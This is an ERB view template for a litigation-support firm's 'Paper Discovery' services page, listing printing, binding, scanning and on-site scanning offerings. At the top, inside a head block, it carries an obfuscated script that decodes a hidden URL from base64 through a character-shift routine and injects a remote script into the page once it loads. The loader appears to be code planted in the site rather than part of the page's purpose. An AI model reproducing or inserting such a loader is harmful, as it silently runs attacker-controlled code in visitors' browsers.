<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "paper_discovery.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Paper <br> Discovery</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6>Paper continues to be a traditional component in most litigation and regulatory matters. Empire invests in technology that enhances the quality of paper production. These improvements create an increase in speed, quality and greater cost savings for our clients.</h6>
          <p class="heading-5"><strong>Our 24/7 Paper Discovery Services include: </strong></p>
          <br>
          <div class="row">
            <div class="col-12 col-lg-6">
              <ul class="list-marked">
                <li><h6>Printing & Copying - High Speed Color and Black & White</h6></li>
                <li><h6>Binders & Inserts - Standard and Custom Printed Labels and Assembly</h6></li>
                <li><h6>Binding - VELO, GBC, ACCO and Ring Binders</h6></li>
                <li><h6>Labeling - Hand and Electronic</h6></li>
                <li><h6>Oversize Printing, Laminating and Mounting</h6></li>
                <li><h6>Courtroom Presentation Boards</h6></li>
              </ul>
            </div>

            <div class="col-12 col-lg-6">
              <ul class="list-marked">
                <li><h6>High Volume Scanning</h6></li>
                <li><h6>Document Preparation and Re-assembly</h6></li>
                <li><h6>Document Coding & Unitization</h6></li>
                <li><h6>OCR and Endorsing</h6></li>
                <li><h6>Load File Creation</h6></li>
                <li><h6>Media Copying - VHS, DVD, CD & Thumbdrives</h6></li>
                <li><h6>On-Site Scanning <br>
                  <ul class="list-marked circle-list-type">
                    <li>Equiment Setup - Scanners & Computers</li>
                    <li>Project staffed with Empire employees</li>
                  </ul>
                </h6></li>
              </ul>
            </div>
          </div>
          <h6 class="mt-5 text-center"><strong>Biometric Secured Facility · Project Assessment & Cost Estimates</strong></h6>
          <br>
        </article>
      </div>
    </div>
  </div>
</section>

